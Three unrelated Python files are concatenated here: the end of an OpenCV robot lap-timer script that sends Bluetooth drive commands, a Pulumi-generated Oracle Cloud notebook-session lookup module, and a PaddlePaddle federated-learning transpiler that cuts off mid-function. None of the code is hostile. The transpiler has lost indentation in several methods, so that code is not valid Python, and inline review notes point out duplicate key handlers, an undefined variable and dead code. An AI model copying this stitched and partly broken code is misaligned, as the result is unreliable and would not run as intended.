                textstr = 'Best time is: '+"{:6.4f}".format(laptime)
            oldlaptime = laptime
        cv2.putText(frame, textstr, org, font,fontScale, color, thickness, cv2.LINE_AA)
        textstr2 = 'Last lap time: '+"{:6.4f}".format(laptime)
        cv2.putText(frame, textstr2, (org[0],org[1]+20), font,fontScale, color2, thickness, cv2.LINE_AA)
        cv2.imshow('MultiTracker', frame)
        ###################################################
        #--------------- Control Strategy ---------------#
        ###################################################
        # Only drive when both markers were found at least once.
        if x != [] and x2 !=[]:
            vto = aa[pathindex] # target coordinate
            try:
                vto_next = aa[pathindex+3] # next target coordinate
            except:
                pass
            _distance = geom.distance((x,y),(x2,y2),vto) # distance to target coordinate
            if _distance < tolerance:
                pathindex += 1 # if close enough to target coordinate, get next coordinate
                vto = aa[pathindex]
                if timeflag == 0:
                    # first waypoint reached: start the lap timer
                    starttime = time()
                    timeflag = 1
                pos_pid.clear()
                angle_pid.clear()
            if pathindex == len(aa)-1:
                # End of path: stop the T-Bot, record the lap, start over.
                sendcount = btcom.send_data('200200Z',sendcount)
                print('Done, reached end of path...')
                #aa = np.flipud(aa)
                laptime = time()-starttime
                #feedforward += 1
                #print(feedforward)
                pathindex = 0
                timeflag = 0
            angle = geom.turn((x,y),(x2,y2),vto)
            #dt = time()-oldtime
            #rotspeed = 200+angle_pid.output(0,-angle,dt)
            rotspeed = 200+angle_pid.output(0,-angle)
            oldtime = time()
            #straightspeedfactor = 1-np.sin(abs(angle))
            straightspeedfactor = 1
            #forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance,dt)+feedforward)
            forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance)+feedforward)
            #------------ build data string ------------#
            # Speeds are packed as zero-padded 3-digit fields around 200.
            rotspeed = '%03d' % rotspeed
            forwardspeed = '%03d' % forwardspeed
            print('forward speed '+forwardspeed+' turn speed '+rotspeed)
            #-------------- Send data ---------------#
            sendstr = str(rotspeed)+str(forwardspeed)+'Z'
            sendcount = btcom.send_data(sendstr,sendcount)
        key = cv2.waitKey(1) & 0xFF
        # NOTE(review): "t" and "y" are each bound twice below; both
        # handlers fire on one key press, which looks unintended.
        if key == ord("t"):
            buttonstring = '200200F' # Auto trim
            sendcount = btcom.send_data(buttonstring,sendcount)
        if key == ord("r"):
            buttonstring = '200200E' # Auto trim
            sendcount = btcom.send_data(buttonstring,sendcount)
        if key == ord("y"):
            buttonstring = '200200T' # Auto trim
            sendcount = btcom.send_data(buttonstring,sendcount)
        if key == ord("f"):
            feedforward -= 1
            print('feedforward = '+str(feedforward))
        if key == ord("g"):
            feedforward += 1
            print('feedforward = '+str(feedforward))
        if key == ord("y"):
            turnspeedfactor -= 0.01
            print('turnspeedfactor = '+str(turnspeedfactor))
        # if the 'q' key is pressed, stop the loop
        if key == ord("t"):
            sendcount = btcom.send_data('200200T',sendcount)
        if key == ord("q"):
            cap.release()
            sendcount = btcom.send_data('200200Z',sendcount)
            btcom.connect(0)
            break
        if record:
            if tii == 5:
                # NOTE(review): `template` is never defined in this file;
                # enabling `record` would raise NameError here.
                cv2.imwrite(template % iii, frame)
                iii += 1
                tii = 0
            else:
                tii += 1
    cv2.destroyAllWindows()
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
# Public API of this generated module.
__all__ = [
    'GetNotebookSessionResult',
    'AwaitableGetNotebookSessionResult',
    'get_notebook_session',
]
@pulumi.output_type
class GetNotebookSessionResult:
    """
    A collection of values returned by getNotebookSession.
    """
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen). The repetitive
    # isinstance checks mirror the provider schema; pulumi.set/get store the
    # values in the form @pulumi.output_type expects.
    def __init__(__self__, compartment_id=None, created_by=None, defined_tags=None, display_name=None, freeform_tags=None, id=None, lifecycle_details=None, notebook_session_configuration_details=None, notebook_session_id=None, notebook_session_url=None, project_id=None, state=None, time_created=None):
        if compartment_id and not isinstance(compartment_id, str):
            raise TypeError("Expected argument 'compartment_id' to be a str")
        pulumi.set(__self__, "compartment_id", compartment_id)
        if created_by and not isinstance(created_by, str):
            raise TypeError("Expected argument 'created_by' to be a str")
        pulumi.set(__self__, "created_by", created_by)
        if defined_tags and not isinstance(defined_tags, dict):
            raise TypeError("Expected argument 'defined_tags' to be a dict")
        pulumi.set(__self__, "defined_tags", defined_tags)
        if display_name and not isinstance(display_name, str):
            raise TypeError("Expected argument 'display_name' to be a str")
        pulumi.set(__self__, "display_name", display_name)
        if freeform_tags and not isinstance(freeform_tags, dict):
            raise TypeError("Expected argument 'freeform_tags' to be a dict")
        pulumi.set(__self__, "freeform_tags", freeform_tags)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if lifecycle_details and not isinstance(lifecycle_details, str):
            raise TypeError("Expected argument 'lifecycle_details' to be a str")
        pulumi.set(__self__, "lifecycle_details", lifecycle_details)
        if notebook_session_configuration_details and not isinstance(notebook_session_configuration_details, dict):
            raise TypeError("Expected argument 'notebook_session_configuration_details' to be a dict")
        pulumi.set(__self__, "notebook_session_configuration_details", notebook_session_configuration_details)
        if notebook_session_id and not isinstance(notebook_session_id, str):
            raise TypeError("Expected argument 'notebook_session_id' to be a str")
        pulumi.set(__self__, "notebook_session_id", notebook_session_id)
        if notebook_session_url and not isinstance(notebook_session_url, str):
            raise TypeError("Expected argument 'notebook_session_url' to be a str")
        pulumi.set(__self__, "notebook_session_url", notebook_session_url)
        if project_id and not isinstance(project_id, str):
            raise TypeError("Expected argument 'project_id' to be a str")
        pulumi.set(__self__, "project_id", project_id)
        if state and not isinstance(state, str):
            raise TypeError("Expected argument 'state' to be a str")
        pulumi.set(__self__, "state", state)
        if time_created and not isinstance(time_created, str):
            raise TypeError("Expected argument 'time_created' to be a str")
        pulumi.set(__self__, "time_created", time_created)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> str:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the notebook session's compartment.
        """
        return pulumi.get(self, "compartment_id")

    @property
    @pulumi.getter(name="createdBy")
    def created_by(self) -> str:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the user who created the notebook session.
        """
        return pulumi.get(self, "created_by")

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Mapping[str, Any]:
        """
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
        """
        return pulumi.get(self, "defined_tags")

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> str:
        """
        A user-friendly display name for the resource. It does not have to be unique and can be modified. Avoid entering confidential information. Example: `My NotebookSession`
        """
        return pulumi.get(self, "display_name")

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Mapping[str, Any]:
        """
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
        """
        return pulumi.get(self, "freeform_tags")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the notebook session.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="lifecycleDetails")
    def lifecycle_details(self) -> str:
        """
        Details about the state of the notebook session.
        """
        return pulumi.get(self, "lifecycle_details")

    @property
    @pulumi.getter(name="notebookSessionConfigurationDetails")
    def notebook_session_configuration_details(self) -> 'outputs.GetNotebookSessionNotebookSessionConfigurationDetailsResult':
        """
        Details for the notebook session configuration.
        """
        return pulumi.get(self, "notebook_session_configuration_details")

    @property
    @pulumi.getter(name="notebookSessionId")
    def notebook_session_id(self) -> str:
        # Identifier the lookup was performed with (passed through unchanged).
        return pulumi.get(self, "notebook_session_id")

    @property
    @pulumi.getter(name="notebookSessionUrl")
    def notebook_session_url(self) -> str:
        """
        The URL to interact with the notebook session.
        """
        return pulumi.get(self, "notebook_session_url")

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> str:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the project associated with the notebook session.
        """
        return pulumi.get(self, "project_id")

    @property
    @pulumi.getter
    def state(self) -> str:
        """
        The state of the notebook session.
        """
        return pulumi.get(self, "state")

    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> str:
        """
        The date and time the resource was created in the timestamp format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: 2019-08-25T21:10:29.41Z
        """
        return pulumi.get(self, "time_created")
class AwaitableGetNotebookSessionResult(GetNotebookSessionResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        """Make the result awaitable.

        The unreachable ``yield`` marks this method as a generator function;
        awaiting it immediately returns a plain GetNotebookSessionResult
        copy of this object's fields.
        """
        if False:
            yield self
        return GetNotebookSessionResult(
            compartment_id=self.compartment_id,
            created_by=self.created_by,
            defined_tags=self.defined_tags,
            display_name=self.display_name,
            freeform_tags=self.freeform_tags,
            id=self.id,
            lifecycle_details=self.lifecycle_details,
            notebook_session_configuration_details=self.notebook_session_configuration_details,
            notebook_session_id=self.notebook_session_id,
            notebook_session_url=self.notebook_session_url,
            project_id=self.project_id,
            state=self.state,
            time_created=self.time_created)
def get_notebook_session(notebook_session_id: Optional[str] = None,
                         opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNotebookSessionResult:
    """
    This data source provides details about a specific Notebook Session resource in Oracle Cloud Infrastructure Data Science service.
    Gets the specified notebook session's information.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_oci as oci
    test_notebook_session = oci.datascience.get_notebook_session(notebook_session_id=oci_datascience_notebook_session["test_notebook_session"]["id"])
    ```
    :param str notebook_session_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the notebook session.
    """
    invoke_args = {'notebookSessionId': notebook_session_id}
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Perform the provider invoke and unwrap the typed result.
    result = pulumi.runtime.invoke(
        'oci:datascience/getNotebookSession:getNotebookSession',
        invoke_args,
        opts=opts,
        typ=GetNotebookSessionResult,
    ).value
    field_names = (
        'compartment_id', 'created_by', 'defined_tags', 'display_name',
        'freeform_tags', 'id', 'lifecycle_details',
        'notebook_session_configuration_details', 'notebook_session_id',
        'notebook_session_url', 'project_id', 'state', 'time_created',
    )
    # Re-wrap the plain result in its awaitable counterpart.
    return AwaitableGetNotebookSessionResult(
        **{name: getattr(result, name) for name in field_names})
|
<reponame>owlet42/FedVision
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import collections
import sys
import six
from paddle.fluid import core, framework
from paddle.fluid.distribute_lookup_table import find_distributed_lookup_table
from paddle.fluid.framework import (
Program,
default_main_program,
default_startup_program,
Parameter,
)
from paddle.fluid.transpiler.distribute_transpiler import (
DistributeTranspilerConfig,
slice_variable,
)
from .details import UnionFind, VarsDistributed
from .details import delete_ops
from .details.ps_dispatcher import RoundRobin, PSDispatcher
# Op types used to detect distributed lookup-table usage.
LOOKUP_TABLE_TYPE = "lookup_table"
LOOKUP_TABLE_GRAD_TYPE = "lookup_table_grad"
# Attribute names / op-role values mirrored from paddle's op maker.
OP_ROLE_VAR_ATTR_NAME = core.op_proto_and_checker_maker.kOpRoleVarAttrName()
RPC_OP_ROLE_ATTR_NAME = (
    op_role_attr_name
) = core.op_proto_and_checker_maker.kOpRoleAttrName()
OPT_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.Optimize
RPC_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.RPC
DIST_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.Dist
LR_SCHED_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.LRSched
# Module-level switch; flipped on by FLDistributeTranspiler when the
# config requests verbose logging.
PRINT_LOG = False


def log(*args):
    """Print *args* (as a tuple) only when module-level PRINT_LOG is set."""
    if not PRINT_LOG:
        return
    print(args)
def same_or_split_var(p_name, var_name):
    """Return True when *p_name* is *var_name* itself or one of the
    ``<var_name>.block...`` slices produced by variable splitting."""
    if p_name == var_name:
        return True
    return p_name.startswith(var_name + ".block")
class FLDistributeTranspiler(object):
    """
    **FLDistributeTranspiler**
    Convert the fluid program to distributed data-parallelism programs.
    In pserver mode, the trainers' main program do forward, backward and optimization.
    pserver's main_program will sum and scale.
    Examples:
        .. code-block:: python
            x = fluid.layers.data(name='x', shape=[13], dtype='float32')
            y = fluid.layers.data(name='y', shape=[1], dtype='float32')
            y_predict = fluid.layers.fc(input=x, size=1, act=None)
            cost = fluid.layers.square_error_cost(input=y_predict, label=y)
            avg_loss = fluid.layers.mean(cost)
            sgd_optimizer = fluid.optimizer.SGD(learning_rate=0.001)
            sgd_optimizer.minimize(avg_loss)
            # for pserver mode
            pserver_endpoints = "192.168.0.1:6174,192.168.0.2:6174"
            trainer_endpoints = "192.168.0.1:6174,192.168.0.2:6174"
            current_endpoint = "192.168.0.1:6174"
            trainer_id = 0
            trainers = 4
            role = "PSERVER"
            t = fluid.FlDistributeTranspiler()
            t.transpile(
                trainer_id, pservers=pserver_endpoints, trainers=trainers)
            if role == "PSERVER":
                pserver_program = t.get_pserver_program(current_endpoint)
                pserver_startup_program = t.get_startup_program(current_endpoint,
                                                                pserver_program)
            elif role == "TRAINER":
                trainer_program = t.get_trainer_program()
    """
def __init__(self, config=None):
if config is not None:
self.config = config
else:
self.config = DistributeTranspilerConfig()
if self.config.split_method is None:
self.config.split_method = RoundRobin
global PRINT_LOG
if self.config.print_log:
PRINT_LOG = True
assert self.config.min_block_size >= 8192
assert self.config.split_method.__bases__[0] == PSDispatcher
def _get_all_remote_sparse_update_op(self, main_program):
sparse_update_ops = []
sparse_update_op_types = ["lookup_table", "nce", "hierarchical_sigmoid"]
for op in main_program.global_block().ops:
if op.type in sparse_update_op_types and op.attr("remote_prefetch") is True:
sparse_update_ops.append(op)
return sparse_update_ops
    def transpile(
        self,
        trainer_id,
        program=None,
        pservers="127.0.0.1:6174",
        trainers=1,
        sync_mode=True,
        startup_program=None,
        current_endpoint="127.0.0.1:6174",
    ):
        """
        Run the transpiler. Transpile the input program.
        Args:
            trainer_id (int): id for current trainer worker, if you have
                n workers, the id may range from 0 ~ n-1
            program (Program|None): program to transpile,
                default is fluid.default_main_program().
            startup_program (Program|None): startup_program to transpile,
                default is fluid.default_startup_program().
            pservers (str): comma separated ip:port string for the pserver
                list.
            trainers (int|str): in pserver mode this is the number of
                trainers.
            sync_mode (bool): Do sync training or not, default is True.
            startup_program (Program|None): startup_program to transpile,
                default is fluid.default_main_program().
            current_endpoint (str): In pserver mode
                this argument is not used.
        Examples:
            .. code-block:: python
                transpiler = fluid.DistributeTranspiler()
                t.transpile(
                    trainer_id=0,
                    pservers="127.0.0.1:7000,127.0.0.1:7001",
                    trainers=2,
                    sync_mode=False,
                    current_endpoint="127.0.0.1:7000")
        """
        if program is None:
            program = default_main_program()
        if startup_program is None:
            startup_program = default_startup_program()
        self.origin_program = program
        self.startup_program = startup_program
        self.origin_startup_program = self.startup_program.clone()
        self.trainer_num = trainers
        self.sync_mode = sync_mode
        self.trainer_id = trainer_id
        pserver_endpoints = pservers.split(",")
        self.pserver_endpoints = pserver_endpoints
        self.vars_overview = VarsDistributed()
        self.optimize_ops, self.params_grads = self._get_optimize_pass()
        ps_dispatcher = self.config.split_method(self.pserver_endpoints)
        self.table_name = find_distributed_lookup_table(self.origin_program)
        self.has_distributed_lookup_table = self.table_name != None
        # Bidirectional name maps between parameters and their gradients.
        self.param_name_to_grad_name = dict()
        self.grad_name_to_param_name = dict()
        for param_var, grad_var in self.params_grads:
            self.param_name_to_grad_name[param_var.name] = grad_var.name
            self.grad_name_to_param_name[grad_var.name] = param_var.name
        # get all sparse update ops
        self.sparse_update_ops = self._get_all_remote_sparse_update_op(
            self.origin_program
        )
        # use_sparse_update_param_name -> split_height_section
        self.sparse_param_to_height_sections = dict()
        # add distributed attrs to program
        self.origin_program._is_distributed = True
        self.origin_program._endpoints = self.pserver_endpoints
        self.origin_program._ps_endpoint = current_endpoint
        self.origin_program._is_chief = self.trainer_id == 0
        self.origin_program._distributed_lookup_table = (
            self.table_name if self.table_name else None
        )
        # split and create vars, then put splited vars in dicts for later use.
        # step 1: split and create vars, then put splited vars in dicts for later use.
        # NOTE(review): `_init_splited_vars` is expected to populate
        # `_opti_var_list`, `_opti_to_param` and `param_grad_ep_mapping`,
        # which are used below but not defined in the visible code -- confirm.
        self._init_splited_vars()
        # step 2: insert send op to send gradient vars to parameter servers
        ps_dispatcher.reset()
        send_vars = []
        # in general cases, the number of pservers is times of 2, and this
        # will lead to uneven distribution among weights and bias:
        # fc_w@GRAD_trainer_0, fc_w@GRAD_trainer_1 --> pserver1
        # fc_b@GRAD_trainer_0, fc_b@GRAD_trainer_1 --> pserver2
        # shuffle the map will avoid the uneven distribution above
        self.opti_name_to_send_dummy_out = dict()
        # recv_program starts as a clone with every op removed; only recv /
        # fetch_barrier ops are appended to it below.
        self.recv_program = self.origin_program.clone()
        all_ops = []
        for op in self.recv_program.global_block().ops:
            all_ops.append(op)
        delete_ops(self.recv_program.global_block(), all_ops)
        # Remember where the original program ends: ops appended after this
        # index are the send-side ops (used by get_trainer_program to split).
        self.split_num = len(program.global_block().ops)
        for opti_varname in self._opti_var_list:
            opti_var = program.global_block().var(opti_varname)
            eplist = ps_dispatcher.dispatch([opti_var])
            dummy_output = program.global_block().create_var(
                name=framework.generate_control_dev_var_name()
            )
            self.opti_name_to_send_dummy_out[opti_varname] = dummy_output
            program.global_block().append_op(
                type="send",
                inputs={"X": [opti_var]},
                outputs={"Out": dummy_output},
                attrs={
                    "epmap": eplist,
                    RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
                    OP_ROLE_VAR_ATTR_NAME: [
                        self._opti_to_param[opti_varname],
                        opti_varname,
                    ],
                    "sync_mode": not self.sync_mode,
                },
            )
            send_vars.append(opti_var)
        if self.sync_mode:
            # One barrier after all sends so pservers see a complete step.
            send_barrier_out = program.global_block().create_var(
                name=framework.generate_control_dev_var_name()
            )
            input_deps = list(self.opti_name_to_send_dummy_out.values())
            program.global_block().append_op(
                type="send_barrier",
                inputs={"X": list(input_deps)},
                outputs={"Out": send_barrier_out},
                attrs={
                    "endpoints": pserver_endpoints,
                    "sync_mode": self.sync_mode,
                    "trainer_id": self.trainer_id,
                    RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
                },
            )
        # step 3: insert recv op to receive parameters from parameter server
        recv_vars = []
        for _, var in enumerate(send_vars):
            recv_vars.append(program.global_block().var(self._opti_to_param[var.name]))
        ps_dispatcher.reset()
        eplist = ps_dispatcher.dispatch(recv_vars)
        for i, ep in enumerate(eplist):
            self.param_grad_ep_mapping[ep]["params"].append(recv_vars[i])
            self.param_grad_ep_mapping[ep]["opti"].append(send_vars[i])
            distributed_var = self.vars_overview.get_distributed_var_by_slice(
                recv_vars[i].name
            )
            distributed_var.endpoint = ep
        # step4: Concat the parameters splits together after recv.
        all_recv_outputs = []
        for opti_varname in self._opti_var_list:
            opti_var = program.global_block().var(opti_varname)
            param_varname = self._opti_to_param[opti_varname]
            param_var = program.global_block().var(param_varname)
            eps = []
            table_names = []
            index = [v.name for v in recv_vars].index(param_varname)
            eps.append(eplist[index])
            # NOTE(review): `var` here is the leftover loop variable from the
            # step-3 loop above, not a per-iteration value; `table_names` is
            # also never consumed -- looks like dead/buggy code, confirm.
            table_names.append(var.name)
            if self.sync_mode:
                # NOTE(review): `recv_dep_in` is assigned but never used.
                recv_dep_in = send_barrier_out
            # get recv op_role_var, if not splited, the grad should have .trainer suffix
            # if splited, grad should be the original grad var name. ParallelExecutor
            # will use op_role_var to get expected device place to run this op.
            all_recv_outputs.extend([param_var])
            self.recv_program.global_block().append_op(
                type="recv",
                inputs={"X": []},
                outputs={"Out": [param_var]},
                attrs={
                    "epmap": eps,
                    "trainer_id": self.trainer_id,
                    RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
                    OP_ROLE_VAR_ATTR_NAME: [param_varname, opti_varname],
                    "sync_mode": not self.sync_mode,
                },
            )
        if self.sync_mode:
            # form a WAW dependency
            self.recv_program.global_block()._insert_op(
                index=len(self._opti_var_list),
                type="fetch_barrier",
                inputs={},
                outputs={"Out": all_recv_outputs},
                attrs={
                    "endpoints": pserver_endpoints,
                    "trainer_id": self.trainer_id,
                    RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
                },
            )
        self._get_trainer_startup_program(recv_vars=recv_vars, eplist=eplist)
        self._get_distributed_optimizer_vars()
        self.origin_program._parameters_on_pservers = self.vars_overview
def get_trainer_program(self, wait_port=True):
    """
    Get transpiled trainer side program.

    Splits the (already transpiled) origin program into a compute part and a
    send part at ``self.split_num`` and returns all three trainer-side
    programs.

    Args:
        wait_port (bool): unused in this variant — presumably kept for
            interface compatibility with the standard transpiler; TODO confirm.

    Returns:
        tuple(Program, Program, Program): (recv_program, origin_program,
        send_program).
    """
    # remove optimize ops and add a send op to main_program
    # FIXME(typhoonzero): Also ops like clip_gradient, lrn_decay?
    lr_ops = self._get_lr_ops()
    # NOTE(review): lr_ops is computed but never used here — looks like a
    # leftover from the upstream transpiler; confirm before removing.
    self.origin_program.__str__()
    self.send_program = self.origin_program.clone()
    # The first split_num ops are the compute ops; the send program keeps
    # only what comes after them, so delete the compute prefix from it.
    compute_ops = self.send_program.global_block().ops[0 : self.split_num]
    delete_ops(self.send_program.global_block(), compute_ops)
    # Conversely, the origin (compute) program drops the send suffix.
    send_ops = self.origin_program.global_block().ops[self.split_num :]
    delete_ops(self.origin_program.global_block(), send_ops)
    return self.recv_program, self.origin_program, self.send_program
def _get_trainer_startup_program(self, recv_vars, eplist):
    """
    Get transpiled trainer side startup program.

    Args:
        recv_vars (list): Variable list to recv for current trainer_id
        eplist (list): A list of strings indicating the endpoint that each
            entry of recv_vars is fetched from (parallel to recv_vars).

    Returns:
        Program: trainer side startup program.
    """
    startup_program = self.startup_program
    # FIXME(gongwb): delete not need ops.
    # note that: some parameter is not trainable and those ops can't be deleted.
    # NOTE(review): this loop only computes eps/table_names and discards
    # them — the ops that consumed these values appear to be absent in this
    # variant, so the method currently returns the startup program unchanged.
    for opti_varname in self._opti_var_list:
        opti_var = self.origin_program.global_block().var(opti_varname)
        param_varname = self._opti_to_param[opti_varname]
        var = self.origin_program.global_block().var(param_varname)
        # Get the eplist of recv vars
        eps = []
        table_names = []
        index = [v.name for v in recv_vars].index(param_varname)
        eps.append(eplist[index])
    return startup_program
def get_pserver_program(self, endpoint):
    """
    Get parameter server side program.

    Builds a fresh Program containing the receive vars, the per-variable
    merge/scale blocks, and a final ``fl_listen_and_serv`` op for the given
    endpoint.

    Args:
        endpoint (str): current parameter server endpoint.

    Returns:
        Program: the program for current parameter server to run.
    """
    # TODO(panyx0718): Revisit this assumption. what if #blocks > #pservers.
    # NOTE: assume blocks of the same variable is not distributed
    # on the same pserver, only change param/grad varnames for
    # trainers to fetch.
    sys.stderr.write(
        "get_pserver_program() is deprecated, call get_pserver_programs() to get pserver main and startup in a single call.\n"
    )
    # step1: new program inheriting the seed and distributed-param info.
    pserver_program = Program()
    pserver_program.random_seed = self.origin_program.random_seed
    pserver_program._copy_dist_param_info_from(self.origin_program)
    # step2: Create vars to receive vars at parameter servers.
    recv_inputs = []
    for v in self.param_grad_ep_mapping[endpoint]["params"]:
        self._clone_var(pserver_program.global_block(), v)
    for v in self.param_grad_ep_mapping[endpoint]["opti"]:
        # create vars for each trainer in global scope, so
        # we don't need to create them when grad arrives.
        # change client side var name to origin name by
        # removing ".trainer_%d" suffix
        suff_idx = v.name.find(".opti.trainer_")
        if suff_idx >= 0:
            orig_var_name = v.name[:suff_idx]
        # NOTE: single_trainer_var must be created for multi-trainer
        # case to merge grads from multiple trainers
        single_trainer_var = pserver_program.global_block().var(orig_var_name)
        if self.sync_mode and self.trainer_num > 1:
            # One receive slot per trainer so sync-mode grads can be merged.
            for trainer_id in range(self.trainer_num):
                var = pserver_program.global_block().create_var(
                    name="%s.opti.trainer_%d" % (orig_var_name, trainer_id),
                    persistable=False,
                    type=v.type,
                    dtype=v.dtype,
                    shape=v.shape,
                )
                recv_inputs.append(var)
    # step 3
    # Create a union-find data structure from optimize ops,
    # If two ops are connected, we could add these two ops
    # into one set.
    ufind = self._create_ufind(self.optimize_ops)
    # step 3.2
    # Iterate through the ops and append optimize op which
    # located on current pserver
    opt_op_on_pserver = []
    for _, op in enumerate(self.optimize_ops):
        if self._is_optimizer_op(op) and self._is_opt_op_on_pserver(endpoint, op):
            opt_op_on_pserver.append(op)
    # step 3.4
    # Iterate through the ops, and if an op and the optimize ops
    # which located on current pserver are in one set, then
    # append it into the sub program.
    # NOTE(review): ufind, opt_op_on_pserver, global_ops,
    # sparse_grad_to_param, lr_ops and grad_to_block_id are computed but
    # never consumed below in this variant — presumably leftovers from the
    # upstream transpiler; confirm before pruning.
    global_ops = []
    # sparse grad name to param name
    sparse_grad_to_param = []
    # append lr decay ops to the child block if exists
    lr_ops = self._get_lr_ops()
    # record optimize blocks and we can run them on pserver parallel
    opti_blocks = []
    # append op to the current block
    grad_to_block_id = []
    pre_block_idx = pserver_program.num_blocks - 1
    for idx, opt_op in enumerate(self._opti_var_list):
        per_opt_block = pserver_program._create_block(pre_block_idx)
        opti_blocks.append(per_opt_block)
        optimize_target_param_name = self._opti_to_param[opt_op]
        pserver_block = per_opt_block.program.global_block()
        # append grad merging ops before clip and weight decay
        # e.g. merge grad -> L2Decay op -> clip op -> optimize
        merged_var = pserver_block.vars[optimize_target_param_name]
        if self.sync_mode and self.trainer_num > 1:
            # Sum the per-trainer copies, then average by trainer count.
            vars2merge = []
            for i in range(self.trainer_num):
                per_trainer_name = "%s.opti.trainer_%d" % (
                    optimize_target_param_name,
                    i,
                )
                vars2merge.append(pserver_block.vars[per_trainer_name])
            per_opt_block.append_op(
                type="sum",
                inputs={"X": vars2merge},
                outputs={"Out": merged_var},
                attrs={"use_mkldnn": False},
            )
            per_opt_block.append_op(
                type="scale",
                inputs={"X": merged_var},
                outputs={"Out": merged_var},
                attrs={"scale": 1.0 / float(self.trainer_num)},
            )
    # In some case, some parameter server will have no parameter to optimize
    # So we give an empty optimize block to parameter server.
    attrs = {
        "optimize_blocks": opti_blocks,
        "endpoint": endpoint,
        "Fanin": self.trainer_num,
        "sync_mode": self.sync_mode,
    }
    # step5 append the listen_and_serv op
    pserver_program.global_block().append_op(
        type="fl_listen_and_serv",
        inputs={"X": recv_inputs},
        outputs={},
        attrs=attrs,
    )
    pserver_program._sync_with_cpp()
    # save pserver program to generate pserver side startup relatively.
    self.pserver_program = pserver_program
    return pserver_program
def get_startup_program(self, endpoint, pserver_program=None, startup_program=None):
    """
    **Deprecated**

    Get startup program for current parameter server.
    Modify operator input variables if there are variables that
    were split to several blocks.

    Args:
        endpoint (str): current pserver endpoint.
        pserver_program (Program): deprecated, call get_pserver_program first.
        startup_program (Program): deprecated, should pass startup_program
            when initalizing

    Returns:
        Program: parameter server side startup program.
    """
    s_prog = Program()
    orig_s_prog = self.startup_program
    s_prog.random_seed = orig_s_prog.random_seed
    params = self.param_grad_ep_mapping[endpoint]["params"]

    def _get_splited_name_and_shape(varname):
        # Map an origin var name to the name/shape of its slice hosted on
        # this pserver; ("", []) when varname is not a renamed slice here.
        for idx, splited_param in enumerate(params):
            pname = splited_param.name
            if same_or_split_var(pname, varname) and varname != pname:
                return pname, splited_param.shape
        return "", []

    # 1. create vars in pserver program to startup program
    pserver_vars = pserver_program.global_block().vars
    created_var_map = collections.OrderedDict()
    for _, var in six.iteritems(pserver_vars):
        tmpvar = s_prog.global_block()._clone_variable(var)
        created_var_map[var.name] = tmpvar
    # 2. rename op outputs
    for op in orig_s_prog.global_block().ops:
        new_outputs = collections.OrderedDict()
        # do not append startup op if var is not on this pserver
        op_on_pserver = False
        # TODO(gongwb): remove this line.
        if op.type not in ["recv", "fetch_barrier", "concat"]:
            for key in op.output_names:
                newname, _ = _get_splited_name_and_shape(op.output(key)[0])
                if newname:
                    op_on_pserver = True
                    new_outputs[key] = created_var_map[newname]
                elif op.output(key)[0] in pserver_vars:
                    op_on_pserver = True
                    new_outputs[key] = pserver_vars[op.output(key)[0]]
        if op_on_pserver:
            # most startup program ops have no inputs
            new_inputs = self._get_input_map_from_op(pserver_vars, op)
            # Initializer ops carry the shape as an attribute, so it must be
            # rewritten to the (possibly sliced) output var's shape.
            if op.type in [
                "gaussian_random",
                "fill_constant",
                "uniform_random",
                "truncated_gaussian_random",
            ]:
                op._set_attr("shape", list(new_outputs["Out"].shape))
            s_prog.global_block().append_op(
                type=op.type,
                inputs=new_inputs,
